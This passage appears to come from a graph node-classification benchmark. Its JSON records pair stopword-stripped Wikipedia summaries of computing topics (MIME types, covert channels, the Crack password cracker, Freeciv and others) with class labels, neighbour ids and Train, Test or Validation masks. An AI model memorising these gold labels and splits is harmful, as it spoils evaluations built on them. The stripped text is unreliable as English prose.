      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 3921,
    "label": 2,
    "text": "Media_type:media type media type formerly known mime type two-part identifier file formats format contents transmitted internet internet assigned numbers authority iana official authority standardization publication classifications media types originally defined request comments 2045 november 1996 part mime multipurpose internet mail extensions specification denoting type email message content attachments hence original name mime type media types also used internet protocols http document file formats html similar purpose media type consists type subtype structured tree media type optionally define suffix parameters currently registered types codice_2 codice_3 codice_4 codice_5 codice_6 codice_7 codice_8 codice_9 codice_10 codice_11 unofficial top-level name common use called chemical example html file might designated codice_12 example codice_10 type codice_14 subtype codice_15 optional parameter indicating character encoding subtype typically consists media format may must also contain content tree prefix producer product suffix according different rules registration trees types subtypes parameter names case-insensitive parameter values usually case-sensitive may interpreted case-insensitive fashion depending intended use media types registered using iana registration procedures efficiency flexibility media type registration process different structures subtypes registered registration trees distinguished use tree prefixes currently following trees created standard prefix vendor codice_44 prefix personal vanity codice_45 prefix unregistered codice_46 prefix registration trees first defined november 1996 obsoleted rfc 2048 currently rfc 6838 new registration trees may created ietf standards action external registration management well-known permanent organizations e.g scientific societies standards tree use tree prefix examples codice_16 codice_40 registrations standards tree must either associated ietf specifications approved directly iesg registered iana recognized standards-related organization vendor tree includes media types associated publicly available products uses codice_44 tree prefix examples codice_27 codice_31 terms vendor producer considered equivalent context industry consortia well non-commercial entities register media types vendor tree registration vendor tree may created anyone needs interchange files associated software product set products however registration belongs vendor organization producing software employs type registered vendor organization time elect assert ownership registration done third party personal vanity tree includes media types associated non publicly available products experimental media types uses codice_45 tree prefix examples codice_56 codice_57 unregistered tree includes media types intended exclusively use private environments active agreement parties exchanging uses codice_46 tree prefix examples codice_60 codice_61 media types tree registered according rfc 6838 published january 2013 use types unregistered tree strongly discouraged addition subtypes prefixed codice_62 codice_63 longer considered members tree according obsoleted rfc 2048 published november 1996 —it rarely ever necessary use unregistered types use codice_46 codice_62 codice_63 prefixes discouraged obsoleted rfc 1590 published september 1993 stated use codice_62 codice_63 prefix may used unregistered subtypes media types widely deployed subtype prefixed codice_62 codice_63 without registered possible re-registered proper prefixed subtype possible media type approval media types reviewer iesg registered standards tree unprefixed subtype suffix augmentation media type definition additionally specify underlying structure media type media types make use named structured syntax use appropriate iana registered codice_71 structured syntax registered unregistered suffixes used since january 2013 structured syntax suffix registration procedures defined rfc 6838 examples currently registered suffixes codice_72 codice_73 codice_74 codice_75 codice_76 codice_77 codice_78 codice_79 rfc 7049 codice_80 codice_72 suffix defined since january 2001 rfc 3023 formal registration codice_72 suffix suffixes defined since january 2013 rfc 6839 mailcap derived phrase mail capability type meta file used configure mime-aware applications mail clients web browsers render files different mime-types mailcap format defined rfc 1524 user agent configuration mechanism multimedia mail format information defined internet standard supported unix systems lines comments starting character mime-type followed handle mime type first part called content-type second part called view-command example codice_83 says file encoded mime type codice_84 run xmpeg program file name parameter associated file mime.types file associates filename extensions mime type mime type properly set unnecessary mime types may incorrectly set set generic type codice_85 codice_86 allows one fall back extension cases similarly since many file systems store mime type information instead rely filename extension mime.types file frequently used web servers determine mime type viewing file two work together follows codice_86 associates extension mime type codice_88 associates mime type program unix-type systems mime.types file usually located codice_89 and/or codice_90 format simply line space-delimited list mime type followed zero extensions example html type associated extensions codice_91 codice_92 following line mime.types file dates netscape used different format used key-value pairs comma-separated list extensions together standard header consisting specific comment identifies file mime.types file follows",
    "neighbors": [
      11137,
      10885,
      3462,
      8070,
      6408,
      11277,
      9874,
      5907,
      3222,
      8854,
      7455,
      5546,
      10413,
      8627,
      8628,
      3126,
      9790,
      10046,
      1347,
      7108,
      11076,
      73,
      3659,
      4045,
      4174,
      10317,
      3280,
      4561,
      722,
      8923,
      479,
      6880,
      10857,
      8426,
      8940,
      237,
      10097,
      2296,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 3922,
    "label": 2,
    "text": "Windows_Desktop_Gadgets:windows desktop gadgets windows desktop gadgets called windows sidebar windows vista discontinued widget engine microsoft gadgets introduced windows vista features sidebar anchored side desktop widgets perform various tasks displaying time date windows vista widgets restricted sidebar windows 7 freely moved anywhere desktop windows desktop gadgets discontinued windows 8 windows 8 live tiles perform similar function visible start menu visible run restrictive environment making less risky also less useful purposes like system monitoring windows sidebar originated microsoft research project called sideshow confused windows sideshow developed summer 2000 used internally microsoft included clock traffic reports im integration windows sidebar appeared build 3683 windows vista circa september 2002 originally intended replace notification area quick launch toolbar windows plans scrapped development reset mid-2004 windows sidebar rebuilt began appear windows vista builds second half 2005 reviewers macintosh enthusiasts pointed sidebar similarities form function konfabulator yahoo widget engine appeared several years previously dashboard widget engine first included apple inc. mac os x v10.4 released months earlier windows 7 windows sidebar renamed windows desktop gadgets sidebar included windows 7 windows desktop gadgets included beta releases windows 8 make final release instead 10 july 2012 intervening time last beta windows 8 final release microsoft issued security advisory disable sidebar desktop gadgets windows vista 7 security vulnerability could allow remote code execution windows desktop gadgets feature windows vista windows 7 excluding windows server family operating system hosts mini-applications gadgets combination scripts html code use cases include displaying system time downloading displaying rss feeds controlling software windows media player windows vista gadgets run docked sidebar windows 7 float anywhere desktop also possible run multiple instances gadget simultaneously windows vista 7 sidebar also works windows xp windows vista ships eleven gadgets calendar clock contacts cpu meter currency conversion feed headlines notes picture puzzle slide show stocks weather several gadgets available vista beta app launcher feed viewer number puzzle recycle bin egg timer never made final release windows vista windows 7 adds media center gadget removes contacts notes stocks gadgets originally microsoft provided link web site called windows live gallery additional sidebar gadgets created third-party developers could downloaded site officially retired october 1 2011",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      5682,
      1077,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      2140,
      9819,
      8798,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10989,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      2358,
      10039,
      11572,
      7482,
      6972,
      3394,
      9557,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 3923,
    "label": 3,
    "text": "Forward_compatibility:forward compatibility forward compatibility upward compatibility design characteristic allows system accept input intended later version concept applied entire systems electrical interfaces telecommunication signals data communication protocols file formats computer programming languages standard supports forward compatibility product complies earlier versions gracefully process input designed later versions standard ignoring new parts understand objective forward compatible technology old devices recognise data generated new devices forward compatibility older system usually means backward compatibility new system i.e ability process data old system new system usually full compatibility older one able process generate data format older system forward compatibility extensibility forward compatible design process least data future version extensible design makes upgrading easy example design ideas found web browsers point time current browser forward compatible gracefully accepts newer version html whereas easily browser code upgraded process newer html determines extensible introduction fm stereo transmission color television allowed forward compatibility since monophonic fm radio receivers black-and-white tv sets still could receive signal new transmitter also allowed backward compatibility since new receivers could receive monophonic black-and-white signals generated old transmitters html designed treat tags way inert unstyled inline elements unless appearance behavior overridden either browser default settings scripts styles included page makes new features degrade gracefully older browsers one case work intended script style blocks whose content meant interpreted browser instead part page cases dealt enclosing content within comment blocks products designed forward compatible referred nuc upwardly compatible cases might intentional designers form vendor lock-in software regression example cubicle producer considers changing cubicle design one designer promotes changing footprint 4 foot square 1.2 meter square immediately sales manager calls nuc problem understood footprint changes existing customers considering buying producer fit different sized unit office designed 4 foot square cubicle planned obsolescence type upward compatibility rather adopting policy backwards compatibility companies adopt commercial policy backwards incompatibility newer apps require newer devices",
    "neighbors": [
      6020,
      139,
      2193,
      799,
      10916,
      7205,
      8110,
      6718,
      7872,
      8262,
      9677,
      5454,
      6102,
      5597,
      1501,
      736,
      8161,
      7269,
      8937,
      246,
      2936,
      6781
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3924,
    "label": 4,
    "text": "Covert_channel:covert channel computer security covert channel type attack creates capability transfer information objects processes supposed allowed communicate computer security policy term originated 1973 lampson defined channels intended information transfer service program effect system load distinguish legitimate channels subjected access controls compusec covert channel called hidden access control mechanisms secure operating systems since use legitimate data transfer mechanisms computer system typically read write therefore detected controlled security mechanisms underlie secure operating systems covert channels exceedingly hard install real systems often detected monitoring system performance addition suffer low signal-to-noise ratio low data rates typically order bits per second also removed manually high degree assurance secure systems well established covert channel analysis strategies covert channels distinct often confused legitimate channel exploitations attack low-assurance pseudo-secure systems using schemes steganography even less sophisticated schemes disguise prohibited objects inside legitimate information objects legitimate channel misuse steganography specifically form covert channel covert channels tunnel secure operating systems require special measures control covert channel analysis proven way control covert channels contrast secure operating systems easily prevent misuse legitimate channels distinguishing important analysis legitimate channels hidden objects often misrepresented successful countermeasure legitimate channel misuse amounts analysis large amounts software shown early 1972 impractical without informed misled believe analysis manage risk legitimate channels trusted computer security evaluation criteria tcsec set criteria deprecated established national computer security center agency managed united states national security agency lampson definition covert channel paraphrased tcsec specifically refer ways transferring information higher classification compartment lower classification shared processing environment difficult completely insulate one process effects another process operating environment covert channel created sender process modulates condition free space availability service wait time execute detected receiving process tcsec defines two kinds covert channels tcsec also known orange book requires analysis covert storage channels classified b2 system analysis covert timing channels requirement class b3 use delays packets transmitted computer networks first explored girling covert communication work motivated many works establish detect covert communication analyze fundamental limitations scenarios ordinary things existence file time used computation medium covert channel communicates covert channels easy find media numerous frequently used two relatively old techniques remain standards locating potential covert channels one works analyzing resources system works source-code level possibility covert channels completely eliminated although significantly reduced careful design analysis detection covert channel made difficult using characteristics communications medium legitimate channel never controlled examined legitimate users example file opened closed program specific timed pattern detected another program pattern interpreted string bits forming covert channel since unlikely legitimate users check patterns file opening closing operations type covert channel remain undetected long periods similar case port knocking usual communications timing requests irrelevant unwatched port knocking makes significant handel sandford presented research study covert channels within general design network communication protocols employ osi model basis development characterize system elements potential used data hiding adopted approach advantages standards opposed specific network environments architectures considered study aim present foolproof steganographic schemes rather establish basic principles data hiding seven osi layers besides suggesting use reserved fields protocols headers easily detectable higher network layers also propose possibility timing channels involving csma/cd manipulation physical layer work identifies covert channel merit covert channel analysis consider issues interoperability data hiding techniques network nodes covert channel capacity estimation effect data hiding network terms complexity compatibility moreover generality techniques fully justified practice since osi model exist per se functional systems girling first analyzes covert channels network environment work focuses local area networks lans three obvious covert channels two storage channel one timing channel identified demonstrates real examples bandwidth possibilities simple covert channels lans specific lan environment author introduced notion wiretapper monitors activities specific transmitter lan covertly communicating parties transmitter wiretapper covert information according girling communicated following obvious ways scenario transmits covert information when-is-sent ” strategy therefore termed timing covert channel time transmit block data calculated function software processing time network speed network block sizes protocol overhead assuming block various sizes transmitted lan software overhead computed average novel time evaluation used estimate bandwidth capacity covert channels also presented work paves way future research focusing ip tcp headers tcp/ip protocol suite article published craig rowland devises proper encoding decoding techniques utilizing ip identification field tcp initial sequence number acknowledge sequence number fields techniques implemented simple utility written linux systems running version 2.0 kernels rowland provides proof concept well practical encoding decoding techniques exploitation covert channels using tcp/ip protocol suite techniques analyzed considering security mechanisms like firewall network address translation however non-detectability covert communication techniques questionable instance case sequence number field tcp header manipulated encoding scheme adopted every time alphabet covertly communicated encoded sequence number moreover usages sequence number field well acknowledgment field made specific ascii coding english language alphabet proposed since fields take account receipt data bytes pertaining specific network packet rowland several authors academia published work covert channels tcp/ip protocol suite including plethora countermeasures ranging statistical approaches machine learning research network covert channels overlaps domain network steganography emerged later",
    "neighbors": [
      10170,
      4067,
      5060,
      4389,
      6877,
      9289,
      5402,
      4303,
      7887,
      9233,
      6162,
      4883,
      6772,
      10968,
      2426,
      6653,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3925,
    "label": 7,
    "text": "Unified_communications_as_a_service:unified communications service unified communications service ucaas category service cloud delivery mechanisms enterprise communications similar platform service paas data center capacity made available enterprise consumption model service provider ucaas unified communications services made available cloud businesses smb enterprise ucaas part global industry trend towards cloud services also known digital transformation ucaas first came prominence 2014 heels cloud movement traditionally enterprises acquired deployed communications infrastructure far economical approach enterprises could deploy pbx switches avoid cost individual phone lines employee advent ip virtualization data center economics shifted back favour service provider model service provider invests virtualized data centre negating need enterprise offers flexible consumption model prior cloud service providers offered ip centrex hosted communications services almost identical ucaas capability except fact “ virtualization ” meant economics ucaas much compelling examples prominent ucaas providers include telserv twilio voxbone telnyx 8x8 zoom video communications primary rationale ucaas fact allows company shift capital investment capex operating cost model opex addition provides companies ability rapidly increase consumption i.e consume licenses decrease consumption without need capital traditional communications model companies must acquire capacity ahead demand rarely get totally correct means over-capacity secondly growing sophistication enterprise unified communications meant companies must invest capital must invest staff order able support growing sophistication adding new features upgrades non-trivial communications critical success business productivity staff maintenance infrastructure requires high level expertise continues grow companies able off-load complexity service providers ucaas model well ensuring always latest versions features historically enterprise government organizations needed keep carriage provider i.e access pstn highly competitive position allowed service provider lock centrex solution may able achieve best carriage rates carriage becoming commodity uc license becoming premium much less risk moving sp ucaas solution features benefits ucaas platform gartner considers uc encompassing six functions significant level internal competition within organizations whether retain existing enterprise communications platform move cloud-based ucaas model number arguments moving ucaas security one common reasons given – companies cautious putting data cloud show sps better placed combat security breach much likely discipline around redundancy data perhaps valid reason concern level customization achieved generally understood on-premises communications platform staff achieve much higher levels customization enterprise course totally dependent capabilities company ’ staff without highly experienced staff organizations easily fall behind sophistication features productivity communications tools jury still total cost ownership tco on-premises ucaas many studies topic difficult compare two solutions given many enterprise companies rarely appreciate true tco on-premises",
    "neighbors": [
      0,
      4194,
      467,
      8471
    ],
    "mask": "None"
  },
  {
    "node_id": 3926,
    "label": 9,
    "text": "ALF_(proof_assistant):alf proof assistant alf another logical framework structure editor monomorphic martin-löf type theory developed chalmers university predecessor alfa agda cayenne coq proof assistants dependently typed programming languages first language support inductive families dependent pattern matching",
    "neighbors": [
      6306,
      5796,
      4791,
      11641,
      1019,
      8924,
      5885
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3927,
    "label": 3,
    "text": "High-availability_cluster:high-availability cluster high-availability clusters also known ha clusters fail-over clusters groups computers support server applications reliably utilized minimum amount down-time operate using high availability software harness redundant computers groups clusters provide continued service system components fail without clustering server running particular application crashes application unavailable crashed server fixed ha clustering remedies situation detecting hardware/software faults immediately restarting application another system without requiring administrative intervention process known failover part process clustering software may configure node starting application example appropriate file systems may need imported mounted network hardware may configured supporting applications may need running well ha clusters often used critical databases file sharing network business applications customer services electronic commerce websites ha cluster implementations attempt build redundancy cluster eliminate single points failure including multiple network connections data storage redundantly connected via storage area networks ha clusters usually use heartbeat private network connection used monitor health status node cluster one subtle serious condition clustering software must able handle split-brain occurs private links go simultaneously cluster nodes still running happens node cluster may mistakenly decide every node gone attempt start services nodes still running duplicate instances services may cause data corruption shared storage ha clusters often also use quorum witness storage local cloud avoid scenario witness device shared two halves split cluster event cluster members communicate e.g. failed heartbeat member access witness become active every application run high-availability cluster environment necessary design decisions need made early software design phase order run high-availability cluster environment application must satisfy least following technical requirements last two critical reliable function cluster difficult satisfy fully common size ha cluster two-node cluster since minimum required provide redundancy many clusters consist many sometimes dozens nodes attached diagram good overview classic ha cluster caveat make mention quorum/witness functionality see configurations sometimes categorized one following models terms logical host cluster logical host used describe network address used access services provided cluster logical host identity tied single cluster node actually network address/hostname linked service provided cluster cluster node running database goes database restarted another cluster node ha clusters usually use available techniques make individual systems shared infrastructure reliable possible include features help minimize chances clustering failover systems required failover service provided unavailable least little measures avoid failover preferred systems handle failures distributed computing different strategies cure failure instance apache cassandra api hector defines three ways configure failover several free commercial solutions available",
    "neighbors": [
      903,
      4616,
      4505,
      1049,
      9243,
      6433,
      6564,
      1701,
      3237,
      11428,
      8233,
      4274,
      4149,
      5047,
      5437,
      1990,
      7750,
      3784,
      4817,
      6483,
      6615,
      2395,
      2913,
      3042,
      7649,
      11618,
      9706,
      3181,
      10733,
      4852,
      8181,
      3450
    ],
    "mask": "Train"
  },
  {
    "node_id": 3928,
    "label": 3,
    "text": "Wizzy_Active_Lifestyle_Telephone:wizzy active lifestyle telephone wizzy active lifestyle telephone w.a.l.t prototype phone companion created apple computer collaboration bellsouth w.a.l.t featured touchscreen fax functionality on-display caller id built-in address book customizable ringtones online banking access system based powerbook 100 included touchscreen stylus handwriting recognition operating system based system 6 hypercard gui announced 1993 system mass-produced prototype machine sold ebay 2012 2019 video demonstration prototype machine uploaded internet",
    "neighbors": [
      9732,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      2735,
      4283,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      1772,
      4844,
      10481,
      1290,
      3338,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      4399,
      11066,
      9022,
      1346,
      10562,
      8525,
      2388,
      8534,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Train"
  },
  {
    "node_id": 3929,
    "label": 9,
    "text": "Logic_of_Computable_Functions:logic computable functions logic computable functions lcf deductive system computable functions proposed dana scott 1969 memorandum unpublished 1993 inspired",
    "neighbors": [
      10049,
      6306,
      11020,
      10031,
      11032
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3930,
    "label": 4,
    "text": "Guard_(information_security):guard information security information security guard device system allowing computers otherwise separate networks communicate subject configured constraints many respects guard like firewall guards may similar functionality gateway whereas firewall designed limit traffic certain services guard aims control information exchange network communication supporting business level unlike firewall guard provides assurance effective providing control even attack failure conditions guard typically sit protected network external network ensure protected network safe threats posed external network leaks sensitive information external network guard usually dual-homed though guards connect two networks acts full application layer proxy engaging separate communications interface guard pass business information carried protocols one network another information passes configured checks provide required protection development guards began late 1970s creation several secure communications processors guard applications secure communications processors high assurance operating systems security kernels developed support controlled plain-text bypasses packet network encryption devices guard applications designed sanitise data exported classified system remove sensitive information honeywell secure communications processor scomp early guard platform evaluated dod computer security center orange book evaluation criteria level a1 rsre secure user environment sue ran pdp-11/34 simple separation kernel designed constructed t4 division royal signals radar establishment rsre malvern england advanced command control architectural testbed accat guard developed export email classified system human review stage later developments guards addressed problem automatic downgrading information exported classified system secure network server sns mail guard smg enforced source/destination address whitelists security label checks attachment type filtering digital signatures ensure sensitive information released firewalls later development arriving around 1987 time functionality firewalls increased provide similar capabilities guards main difference remaining guards built way provide assurance effective protecting network swipsy firewall toolkit developed defence evaluation research agency act general guard platform swipsy layered top trusted solaris 8 guards initially designed control release information classified systems protecting confidentiality sensitive information handled protected system since scope extended cover controls import data order protect integrity information availability services protected network guards generally provide following functionality guards functionally equivalent bastion host acting application proxy placed within dmz network proxy imposes necessary controls data exchanged provide protection external threats internal leaks distinguished way constructed dmz network relies outer packet filtering firewalls route traffic bastion host firewalls function incorrectly may pass traffic dmz without passing bastion host checks imposed proxies bypassed also networking stack bastion host behaves incorrectly may route traffic dmz without passing proxies guard constructed software needs function correctly minimised work needed demonstrate third party also minimised guards engineered provide assurance apply appropriate checks guards use trusted operating system separate security critical checker components less critical protocol handling components way failure protocol handling components cause data bypass checker example security-enhanced linux used nexor guards solaris 10 trusted extensions used radiant mercury isse guard deep-secure type enforcement controls developed lock operating system used sidewinder guards also use physically separate computers ensure critical components bypassed government-off-the-shelf products commercial-off-the-shelf products",
    "neighbors": [
      800,
      6337,
      10210,
      4067,
      4806,
      8998,
      5608,
      11046,
      11022,
      11502,
      4404,
      4725,
      5373,
      2426,
      4573,
      6110,
      4895
    ],
    "mask": "Test"
  },
  {
    "node_id": 3931,
    "label": 6,
    "text": "RozoFS:rozofs rozofs free software distributed file system comes free software licensed gnu gpl v2 rozofs uses erasure coding redundancy rozo provides open source posix filesystem built top distributed file system architecture similar google file system lustre ceph rozo specificity lies way data stored data stored translated several chunks using mojette transform distributed across storage devices way retrieved even several pieces unavailable hand chunks meaningless alone redundancy schemes based coding techniques like one used rozofs allow achieve significant storage savings compared simple replication file system comprises three components rozo systems invited snia data storage innovation conference june 2016",
    "neighbors": [
      3328,
      11363,
      11323,
      2314,
      8554,
      7983,
      3795,
      823,
      3450,
      2395,
      2045,
      3582,
      6591
    ],
    "mask": "Test"
  },
  {
    "node_id": 3932,
    "label": 3,
    "text": "Motorola_68012:motorola 68012 motorola mc68012 processor 16/32-bit microprocessor early 1980s 84-pin pga version motorola mc68010 memory space extended 2 gb read-modify-write cycle rmc pin indicating indivisible read-modify-write cycle progress added order help design multiprocessor systems virtual memory processors hold memory accesses cycle complete features mc68010 preserved expansion memory space caused issue programs used high byte address store data programming trick successful processors 24-bit address bus 68000 68010 similar problem affected 68020",
    "neighbors": [
      7299,
      3844,
      4868,
      1158,
      7302,
      10501,
      7305,
      3467,
      1548,
      6415,
      2073,
      7065,
      8102,
      5297,
      11314,
      11447,
      8761,
      6715,
      1983,
      10945,
      3017,
      336,
      8530,
      3540,
      3936,
      7269,
      9964,
      8048,
      3185,
      10224,
      5235,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 3933,
    "label": 4,
    "text": "Cybergeddon:cybergeddon cybergeddon tech cyber- lit computer hebrew megiddo extracted har megiddo mountain final battle refers cataclysm resulting large-scale sabotage computerized networks systems activities combines cyberterrorism cyberwarfare cybercrime hacktivism scenarios wide-scale internet disruption economic collapse economic industrial infrastructure could targeted banks industrial control systems since 2012 amount internet-based attacks complexity increased cybergeddon possibility fireeye ceo ashar aziz explained interview bloomberg attacks critical infrastructures power grid financial institutions could wreak havoc united states economy fact world economy",
    "neighbors": [
      9688,
      4945,
      5563
    ],
    "mask": "Test"
  },
  {
    "node_id": 3934,
    "label": 1,
    "text": "Skyline_operator:skyline operator skyline operator subject optimization problem used query filter results database keep objects worse operator extension sql proposed börzsönyi et al classic example application skyline operator involves selecting hotel holiday user wants hotel cheap close beach however hotels close beach may also expensive case skyline operator would present hotels worse hotel price distance beach give example sql börzsönyi et al proposed following syntax skyline operator ... denote dimensions skyline min max diff specify whether value dimension minimised maximised simply different skyline operator implemented directly sql using current sql constructs however shown slow algorithms proposed make use divide conquer indices mapreduce general-purpose computing graphics cards skyline queries data streams i.e continuous skyline queries studied context parallel query processing multicores owing wide diffusion real-time decision making problems data streaming analytics",
    "neighbors": [
      8514,
      9290,
      11343,
      10413
    ],
    "mask": "Test"
  },
  {
    "node_id": 3935,
    "label": 4,
    "text": "Microsoft_Forefront:microsoft forefront microsoft forefront discontinued family line-of-business security software microsoft corporation microsoft forefront products designed help protect computer networks network servers microsoft exchange server microsoft sharepoint server individual devices 2015 actively developed forefront product forefront identity manager forefront includes following products predecessor forefront server protection products antigen line antivirus products created sybari software sybari acquired microsoft 2005 first microsoft-branded version product called microsoft forefront security sharepoint fssp version 10 fssp version 10 supports microsoft office sharepoint server 2007 microsoft windows sharepoint services version 3 whereas fpsp last version product supports microsoft office sharepoint server 2010 microsoft sharepoint foundation 2010 microsoft office sharepoint server 2007 sp1 windows sharepoint services version 3 sp1",
    "neighbors": [
      7809,
      2309,
      1417,
      4490,
      2443,
      537,
      3482,
      2213,
      8998,
      5799,
      5673,
      3629,
      7473,
      5057,
      10828,
      467,
      5082,
      9695,
      4704,
      11248
    ],
    "mask": "Train"
  },
  {
    "node_id": 3936,
    "label": 3,
    "text": "Motorola_68008:motorola 68008 motorola 68008 8/16/32-bit microprocessor made motorola version motorola 68000 8-bit external data bus well smaller address bus original 68000 introduced 1979 24-bit address bus 16-bit data bus relatively large buses made hard design low-cost system based 68000 difficult lay circuit board needed lot supporting circuitry 16-bit data bus also required twice many memory chips 8-bit one 68008 introduced 1982 designed work low-cost 8-bit memory systems smaller data bus half fast 68000 clock speed however still faster competing 8-bit microprocessors 68008 internally based 32-bit data registers 16-bit data bus except smaller data address buses 68008 behaved identically 68000 internal organization microarchitecture 68008 hmos chip came speed grade two distinct versions chip original version came 48-pin dual in-line package 20-bit address bus allowing use 1 megabyte memory later version came 52-pin plastic leaded chip carrier version provided 22-bit address bus could support ram computer systems used 68008 main processor sinclair ql personal computer best known however 68008 popular embedded systems motorola ended production 68008 1996",
    "neighbors": [
      7299,
      3844,
      4868,
      1158,
      7302,
      10501,
      7305,
      3467,
      1548,
      398,
      6415,
      2073,
      7065,
      8102,
      5297,
      11314,
      11447,
      8761,
      2874,
      6715,
      1983,
      10945,
      3017,
      5455,
      336,
      8530,
      3540,
      3932,
      3680,
      7269,
      9964,
      8048,
      3185,
      10224,
      5235,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 3937,
    "label": 4,
    "text": "Crack_(password_software):crack password software crack unix password cracking program designed allow system administrators locate users may weak passwords vulnerable dictionary attack crack first standalone password cracker unix systems later first introduce programmable dictionary generation crack began 1990 alec muffett unix system administrator university wales aberystwyth trying improve dan farmer 'pwc cracker cops found re-engineering memory management got noticeable performance increase led total rewrite became crack v2.0 development improve usability first public release crack version 2.7a posted usenet newsgroups alt.sources alt.security 15 july 1991 crack v3.2a+fcrypt posted comp.sources.misc 23 august 1991 introduced optimised version unix crypt function still really faster version already available packages release crack v4.0a 3 november 1991 however introduced several new features made formidable tool system administrators arsenal crack v5.0a released 2000 introduce new features instead concentrated improving code introducing flexibility ability integrate crypt variants needed attack md5 password hashes used modern unix linux windows nt systems also bundled crack v6 minimalist password cracker crack v7 brute force password cracker randal l. schwartz notable perl programming expert 1995 prosecuted using crack password file system intel case verdict eventually expunged crack also used kevin mitnick hacking sun microsystems 1993 traditional password cracking tools simply fed pre-existing dictionary words crypt function crack v4.0a introduced ability apply rules word list generate modified versions word lists could range simple change extremely complex documentation gives example rules could also process gecos field password file allowing program use stored names users addition existing word lists crack dictionary generation rule syntax subsequently borrowed extended solar designer john ripper dictionary generation software crack subsequently reused muffett create cracklib proactive password checking library bundled debian red hat enterprise linux-derived linux distributions password cracking inherently embarrassingly parallel crack v4.0a introduced ability use network heterogeneous workstations connected shared filesystem parts distributed password cracking effort required provide crack configuration file containing machine names processing power rates flags required build crack machines call -network option",
    "neighbors": [
      7426,
      6916,
      3845,
      7556,
      7557,
      8582,
      8976,
      3350,
      10135,
      2716,
      413,
      8612,
      4140,
      7983,
      823,
      8513,
      9665,
      8137,
      8787,
      8152,
      6617,
      733,
      3172,
      4580,
      5492,
      8827,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3938,
    "label": 2,
    "text": "Project_Trillian:project trillian project trillian effort industry consortium port linux kernel itanium processor project started may 1999 goal releasing distribution time initial release itanium scheduled early 2000 end 1999 project included caldera systems cern cygnus solutions hewlett-packard ibm intel red hat sgi suse turbolinux va linux systems project released resulting code february 2000 code became part linux baseline kernel year release first itanium processor trillian project able two reasons successful completion project trillian resulting linux kernel used manufacturers itanium systems hp ibm dell sgi fujitsu unisys hitachi groupe bull notable exception hp linux either primary os os manufacturer supports itanium ongoing free open source software support linux itanium subsequently coalesced gelato",
    "neighbors": [
      10883,
      4996,
      6148,
      5384,
      7053,
      5523,
      9619,
      11673,
      6557,
      3359,
      10273,
      6442,
      7983,
      9137,
      9139,
      6325,
      823,
      573,
      1219,
      964,
      10051,
      6342,
      863,
      5603,
      868,
      3429,
      5220,
      9829,
      9455,
      375,
      2168,
      3323,
      2172,
      2813
    ],
    "mask": "Train"
  },
  {
    "node_id": 3939,
    "label": 2,
    "text": "Freeciv:freeciv freeciv single- multiplayer turn-based strategy game workstations personal computers inspired proprietary sid meier civilization series available desktop computer operating systems available online browser based version released gnu general public license freeciv free open source software game default settings closest civilization ii gameplay graphics including units isometric grid players take role tribal leaders 4000 b.c must guide peoples centuries time new technologies discovered allow construction new city buildings deployment new units players wage war one another form diplomatic relationships game ends one civilization eradicated others accomplished goal space colonization given deadline one civilization remains deadline player highest score wins points awarded size civilization wealth cultural scientific advances computer science department aarhus university three students avid players xpilot sid meier civilization stand-alone pc game ms-dos decided find whether two could fused x-based multiplayer civilization-like strategy game students—peter unold claus leth gregersen allan ove kjeldbjerg—started development november 1995 first playable version released january 1996 bugfixing small enhancements april rules game close civilization client/server architecture basically xpilot developers freeciv 1.0 successful proof concept rather boring game went back xpilot players developers took made game available many operating systems including linux solaris ultrix amiga os microsoft windows linux distributions started include freeciv main development goal remained make civilization-like game playable internet participants different continents even connected 14400 bit/s modems freeciv achieved using asynchronous client-server protocol turn human users play concurrently actions sent server processing without awaiting results kept game playable network latency hundreds milliseconds 1998 computer players added could soon beat newcomers game ease using minor forms cheating computer players implemented directly server play concurrently human players separately turns game grew popularity public server installed games could played around clock retained games published post-game analysis webpage per-player statistics animated map replay subsequent 1.x releases improved gui improved gameplay added many small features time winning strategy proved city smallpox sprawling map many small cities fast possible whoever could develop fastest would win game growing developing individual cities n't worthwhile practice around 2002 experienced players would form teams start game fork freeciv included specific features team play version 